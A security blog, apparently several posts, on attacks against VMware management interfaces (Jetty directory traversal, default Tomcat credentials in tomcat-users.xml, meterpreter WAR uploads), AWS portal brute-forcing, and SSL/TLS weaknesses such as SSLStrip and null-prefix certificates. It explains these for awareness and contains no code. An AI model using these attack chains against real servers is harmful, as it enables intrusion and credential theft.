Attacking management interfaces

29 09 2014

The management interfaces and everything that is incorporated into that software is, in the author’s opinion the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breeched. The majority of these attacks are general attacks that use pre-existing attack methods such as brute forcing, MiTM (man-in-the-middle) and the numerous flaws with the PKI infrastructure. There are multiple proven attack methods available for exploiting management interfaces and below are descriptions of some of these attacks that have been discovered by researchers.

In an online blog (Mluft, 2011)  talks about how a brute force attack is achievable on the Amazon Web Services (AWS) portal by leveraging existing hacking software tools. In the attack (Mluft, 2011) demonstrated how it is possible to determine a successful logon using the exemplary payloads in the Burp Suite (Burp Suite, 2012). The use of the burp suite in this example is to simply automate the process of attempting logins to the interface. The payload in the software is also able to identify failed login attempts to the portal by returning a HTTP status code of 200 (Network Working Group , 1999). A correct password attempt is identified by a returned HTTP status code of 302. Using the documentation provided by Amazons services in relation to password policies (Mluft, 2011) created an appropriate wordlist and used the burp suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results purged for the 302 status code. The code was found and also shown alongside was the value and the password attempted. This gave the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts were originated from one IP address without the account being locked-out or subject to any account throttling.

As discussed earlier my earlier blog artical regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems including a specific VMware brute forcing module, which mimics the attack on the AWS portal by (Mluft, 2011). One of the main contributors to the VASTO project (Criscione, 2010) demonstrated a number of the different functions found in VASTO at Blackhat USA 2010.  Although (Criscione, 2010) demonstrated how VASTO can be used at multiple layers of the virtual stack (Client, Hypervisor, Support, Management and internal), the majority concentrated on the management portion. (Criscione, 2010) confirms that although the (VMware, 2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored and left situated on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

The other element used in the VASTO modules which can target the management portion of the virtual infrastructure uses target flaws in the VMware components and implementation to expose threats in the infrastructure. One of the exploits that is included in the VASTO suite that best demonstrates how multiple components in these systems can be used for exploitation, originates via a flaw in the Jetty (Eclipse, 2012) web server that is used by vCenter Update manager. In the author’s opinion, this attack signifies how the complexity and code overhead that these management servers introduce, make securing virtual environments in an efficient manner, one that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete the attack.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating process of hosts that fall under its management scope. However, (Criscione, 2010) recognised that the update manager requires a version of Jetty web server to operate. This is an additional component that is added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 u1 (update 1) of the update manager was a version vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any files on a server that the Windows SYSTEM user has privileges. Consequentially vCenter stored a file on the server called “vpxd-profiler-*” which is a file used by administrators for debugging purposes. In this extensive file the, SOAP Session ID’s of all the users that have connected to that server are contained. With this ID the vmware_session_rider module, found in the VASTO toolkit, acts as a proxy server to allow the attacker to then connect through it into the vCenter server using the selected administrator SOAP ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware’s use of Apache Tomcat technology (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser one is presented with the standard vSphere “Getting started” screen as is shown in figure 1

Web browser connection to vCenter server

Web browser connection to vCenter server

Connection to that same servers IP address, but specifying the default tomcat Tomcats index page port of “8443” over an SSL connection shows further information, including a link to login as the “Tomcat manager”. This page is shown in figure 2

The web interface seen when you navigate to vCenter with a port of 8443

The web interface seen when you navigate to vCenter with a port of 8443

In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server, which has full admin rights to the Tomcat service. In the earlier versions of VMware, the password for this admin account was 5 characters long starting with 3 uppercase, 1 number and one lowercase. This leaves an attacker with a number of options for an attacking perspective. The most obvious is to brute force the credentials with a compatible tools or script such as the Apache tomcat brute force tool (Snipt, 2011). A second (and more sophisticated attack) would be to use the folder traversal vulnerability introduced by the Jetty service to gain read access to the server. From here the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf) as shown in Figure 3, which is an XML file found in VMware 4.1 and which shows the clear text credentials of the account.

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, one is able to change a number of settings through the tomcat interface, including the ability to upload custom WAR files, which can be created using Metaspolit to upload meterpreter payloads to the server.

Logged in to the tomcat manager using the credentials found on server

Logged in to the tomcat manager using the credentials found on server

Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that are not as fundamental to secure as simply applying a patch or updating to the newest version. As is explained briefly in by post on hypervisors, access to these interfaces are vulnerable to MiTM attacks and the implementations dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address this issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model and how it can be bypassed by in a blog post from 2011.

 

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html

Advertisements




NSA/GCHQ snooping

25 06 2013

Although this may be brief, especially when considering the topic, I feel that I should at least throw my two cents into the pot on the current NSA/GCHC debacle.

I would say that I am somewhat of an advocate for online security and privacy, but have to say that I was not overwhelmingly shocked after hearing the events unravel and feel that I should explain why. I think that myself and a portion of the industry involved in computer security would already considered that traffic has always being captured to some degree, whether it’s by the ISP, the government or other more dangerous parties. Personally when sending an email to someone I always have in the back of my mind, that this communication is unencrypted and therefore shouldn’t contain anything that I wouldn’t be happy shouting from a street corner (so to speak). So when the yells started about the government tapping fibre at key providers, I couldn’t relate with the reaction of others.

The internet is an open network that requires packets to expose certain metadata, such as destination and source to function. Yes this information can be used to build a ‘mapping’ of you, but so can many other things like metadata that is generated from mobile phone usage, such as physical mast location – which is also provided to the government. People may want to throw on a tinfoil hat and cut all connection with the outside world, but when it is all said and done unless you are doing something incredibly wrong, then it is most likely that this information will be discarded. Are 99% of us not already being tracked as we navigate through the internet by third parties cookie for advertising purposes by companies like Google (doubleclick)?

If you want to stay secure on the internet without taking extreme measures such as Tor or VPN solutions, just ensure that your information is encrypted using good modern encryption techniques and understand that there are still elements of the internet that are more open than others. Also take basic steps like ensuring that desktops are patched and Java is uninstalled (I mean up-to date), these are the areas where more harm will arise from the internet then government snooping.





Conclusion on SSL/TLS

17 08 2011

I decided to focus on the SSL and TLS protocols in this blog series rather than any of the other secure communication protocols, as I feel that the secure transportation of browser information is only set for exponential growth, with the pressing requirement of online personal accounts and push of cloud computing, we can all expect to be entering sensitive information online sooner or later.

As you can see SSL and TLS are far from uninfringeable protocols, even after almost 20 years of improvements and revisions, however when compared to other technologies that have been around for that amount of time it has actually proved one of the more robust ones.

Since the protocol was taken over by the Internet Engineering Task Force, flaws such as the redirection attack that was mentioned earlier have often been quickly released. The issue with these flaws is the time it takes venders and administrators to patch their software and sites, leaving users data vulnerable.

In many of the examples that are given around defeating SSL and TLS, it’s not the actual protocols themselves that are allowing this leakage of data. The vulnerabilities that surround these security protocols often have more to do with the worsening certificate ecosystem and user education. This will only worsen unless something is done about growing companies lackadaisical approach to validating users. Due to this slip is validation, the traditional SSL certificate has somewhat been superseded by the Extended Validation (EV) certificate, which is not only more expensive but also requires a set criteria to be followed by the issuer (http://www.cabforum.org/Guidelines_v1_2.pdf) prior to issuing the certificate.

Sites such as Hotmail and Gmail are now starting to become slightly savvier to the SSL and TLS bouncing attacks by starting the user off on encrypted pages to avoid SSL stripping attacks. Also since the release of Firesheep late last year (http://codebutler.github.com/firesheep), a session hijacking tool that prays on users sharing unencrypted Wi-Fi connection, sites such as Facebook and twitter now give users the option to stay ‘HTTPS’ for their entire session (Rice, 2011).

There are always new efforts arising to increase the security of the SSL & TLS protocols. However these will only ever be additional steps that are added to the existing network model, to satisfy this growing need to secure data over a system that was never designed for this kind of traffic. The latest version of TLS, 1.2 however has been designed in such a way that it will most likely be in use for some time to come.





Human Weaknesses in SSL/TLS

11 08 2011

As with any element of computer attacks, often the most effective methods of exploitation come from of non technical attacks that exploit the human element, unfortunately this is no different when talking about SSL/TLS. The ability to trick users into entering their personal information into insecure ‘SSL secured’ pages can be done through a number of ways.

Phishing sites are now being increasingly used to exploit this vulnerability, in research carried out by (Symantec, 2009) they found that due to the trust that users would associate with an SSL connection, hackers were targeting sites with already valid SSL certificates and using them to host a number of different phishing sites, as the browser will show the standard secure padlock or the green bar in the case of Extended Validation (EV) SSL Certificates. As this is intended to indicate security, the user is often unaware that the domain is different from the intended site and will proceed to enter their information. (Symantec, 2009) Also details that:

“From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence.”

Another method of using phishing to exploit users, which has also been reported on by (Symantec, 2011), is through misspelled domain names. Attackers can register a number of sites that have variations in the spelling of popular domain names, this way they can legally acquire valid certificates for these sites. The site is then designed to look the same as the real site, from there the attacker will wait for users to mistype a site name or proactively send out bulk emails posing as that real site with links back to their fraudulent web page.

Something that might seem obvious to most user but can also be construe when talking about SSL/TLS is that the protocol itself cannot protect users with weak passwords against brute force or dictionary attacks, as there is nothing in the protocol to specify complexity rules or number off attempts. This responsibility is given to the individual websites.

Although the human factor is inevitably one of the hardest things to ‘patch’, there are some measures being done to combat this issue, by alleviating the user’s ability to click through warnings and error messages.

One standard that has recently been adopted by the IETF is HTTP Strict Transport Security (HSTS). Strict Transport Security is now supported in both Chrome and Firefox version 4 – with a number small number of websites, including Paypal.com offering support for this standard. HSTS works by sending the browser an STS cookie on first logon, which is stored on the device. From this point forward this site specific cookie ensures that all communication between that domain and the client is encrypted with no allowances for any certificates errors or any unencrypted portions of traffic.

In the latest version of the HTTP Strict Transport Security (HSTS) draft (http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-01), it states in section 2.2 the three characteristics of HSTS as being:

• That all insecure connection to a HSTS website should be forced to a secure HTTPS page.

• That any secure connection that is attempted resulting in an error or warning, “including those caused by a site presenting self-signed certificates” will be terminated.

• “UAs transform insecure URI references to a HSTS Host into secure URI references before dereferencing them.”





Certificate weaknesses in SSL/TLS

31 07 2011

A major component that guarantees the authenticity of an SSL/TLS connection within the browser is done through the use of digital certificates. Root certificates are installed and updated independently by each browser vendor. A root cert is a self-signed certificate that can issue certificates to websites once they have proven their identity and ownership of the domain. As shown in Figure 1, Firefox has a number of root certificates installed as default, including the Japanese Government and the Hong Kong Post office.

This means that we, as users inherently trust any sites that are signed by these root authorities. The increase in the amount of root CA’s has resulted in certificates now being much easier to obtain then a number of years ago, with often very little validation being performed before being issue, (Hebbes, 2009) writes:

“the problem is that most Certification Authorities don’t do very much checking. Usually they check your domain name by sending you an email to an address that has the same domain name extension. All this says is that someone who has access to an email address on that domain wants to set up a secure web server. They don’t actually check who you are”

At Defcon 17, (Marlinspike, 2009) gave a talk on defeating SSL security by using a tool that he had developed called SSLSNIFF (http://www.thoughtcrime.org/software/sslsniff/) this tool uses multiple vulnerabilities in the certificate validation process and SSL/TLS implementation found in all the major browsers used today.

In the presentation (Marlinspike, 2009) explains that when completing a certificate signing request (CSR) (which is defined by the PKCS #10 standard) the subject attribute field, which is made up of several other sub attributes, requires the requester to enter the name of the site they wish to request the certificate for. As the SSL certificate process can now be completed purely online and also due to the different ways that strings can be formatted in the ‘commonName’ field according to X.509 (RFC2459), an attacker is able to use the null character string to separate the start of the commonName value from the end.

This way, only the end of the commonName attribute (the domain they own) is checked by the Root CA against the WHOIS database records. This means that they are able to add anything they want into the commonName attribute before the null value – such as http://www.paypal.com. A diagram of this process can be found below.

Armed with this certificate and SSLSNIFF an attacker is able to insert themselves into the middle of communication and act as Paypal.com – with what looks like a completely valid certificate. (Marlinspike, 2009) explains that this attack is possible not only in web browsers such as; Firefox, IE and Chrome, but also in mail clients like Thunderbird and Outlook and even SSL VPN solutions such as Citrix.

Finally (Marlinspike, 2009) demonstrated an attack base around the Network Security Services (NSS) libraries, which are implemented in Firefox and Chrome where an attacker is able to use the certificate wildcard function to gain a universal wildcard certificate using *.domain.com, which effectively gives an attacker a valid digital certificate for any website they wish.





Technical Implementation Attacks on SSL/TLS

11 07 2011

As shown in the introduction, since the original release of SSL 1.0 there have been a number of amendments required due to vulnerabilities found in the implementation or the protocol. While the latest version of the TLS protocol (1.2) currently appears to be fairly robust against external attacks – with the introduction of the SHA256 cipher suites, not all secure communication today takes advantage of this standard. As shown in Figure 1 – which is a screenshot taken of the supported transport protocols within Firefox 3.6.15, this shows that the Mozilla developers are yet to adopt the latest two versions of TLS, leaving users open to weakened ciphers and other vulnerabilities that have been addressed in newer versions.

The majority of attacks on SSL and TLS that occur are from within the same LAN, in the form of Man-in-the-middle attacks (MITM). These attacks work by an attacker placing themselves in-between the client and the server; this is done by using the address resolution protocol (ARP) to spoof the whereabouts of MAC addresses on the network. This works at layer 2 of the OSI model and is how machines communicate on all Ethernet LANs, this attack is explained in Appendix 1. In a white paper written by (Burkholder, 2002) he writes about how it was:

“In late 2000 security researcher Dug Song published an implementation of an SSL/TLS protocol MITM attack as part of his ‘dsniff’ package.”

Due to the processing overhead associated with the asymmetric algorithms that SSL/TLS use, sites have often only used these protocols where it is needed. It is not unusual for the majority of websites that actually use SSL to protect user’s information, to have them filled out their sensitive information on an unencrypted page first, before ‘bouncing’ the data through an SSL/TLS encrypted tunnel. This method of securing data is adequate against attackers that are not proactively sniffing network communications. However when using a tool like SSLStrip, as described by creator (Marlinspike, 2009) you are able to add yourself in as a bridge between the two lines of communication. As most users either encounter SSL/TLS through either a 302 redirection request, directing them from a HTTP page to a HTTPS page or in the way that shopping sites bounce you to HTTPS pages. This software intercepts the users request for the HTTPS page and strips the ‘S’ out of the request. It will do this so that all communication that takes place is over a non encrypted HTTP protocol. The software keeps track of changes it makes by adding each action it performs into a internal mapping buffer. The attacker is then able to sniff the information being sent in clear text.

The only way this attack can be spotted by a user is by checking that the address bar is showing HTTPS instead of HTTP and that the SSL padlock is also shown (location is dependent on individual browser), although there are ways to change the address icon from, say the Google logo to a padlock in transit.

Early in November 2009, in an article released by (Ray & Dispensa, 2009) information was disclosed of a flaw in the renegotiation portion of the TLS /SSL protocol. This attack affected all versions of TLS and also version 3 of SSL. Although this issue has now been patched by most individual vendors SSL/TLS implementations, an article written by (Pettersen, 2010) reports on research that suggests one year after the public disclosure of the flaw, only 37.3% of all SSL/TLS servers have been patched against the issue.





The History of SSL/TLS

27 06 2011

Netscape Communications created the original specification of secure socket layer (SSL) in 1994, when it became apparent that there was no way to securely transfer reliable protocols across the internet, without fear of interference or snooping of traffic. The first specification, version 1.0 was so heavily criticised by the cryptographic community for the implementation of weak cryptographic algorithms that it was never realised for public use.

The Netscape Communications department revised the specification and released a much improved version 2.0 in February 1995, as described by (Shostack, 1995) the second version of the protocol requested the use of the MD5 hash function and required the use of MD5 for all cipher types, the MD5 algorithm is defined in (RFC 1321).

While SSL version 2.0 was considered a fairly strong and robust protocol, it did have some areas where it was vulnerable. So in 1996 the next iteration of the protocol version 3.0, which was designed by both Netscape and Paul Kocher, was released. As described by (Gibson, 2009) version 3 addressed the implementation of the weak MD5 hash that was implemented in version 2 by producing both an MD5 hash and a SHA-1 hash and XOR’ing the result together to create a hybrid hash that was dependant on both algorithms.

As the protocol was now gaining such traction on the internet, the Internet Engineering Task Force (IETF) took responsibility for the protocol and renamed it to transport Layer Security (TLS) to avoid bias towards any particular company. There first release of the protocol, which was in essence a moderately improved version of SSL version 3 (as show in table 1-0), was release in January 1999. Although the new TLS 1.0 protocol, which is detailed in (RFC 2246), was based on SSL version 3.0 it offered no interoperability with the SSL protocol.

Table 1-0 Differences between SSL and TLS (Thomas, 2000)

In April 2006 the IETF release version 1.1 of the standard. The update according to (RFC 4346), the update:

“contains some small security improvements, clarifications, and editorial improvements”

Finally the latest and most current version of the TLS standard, 1.2 and was released in August 2008 and has a number of improvements as documented in (RFC 5246), including the removal of older cipher suites like DES and IDEA and the inclusion of the SHA256 cipher suites.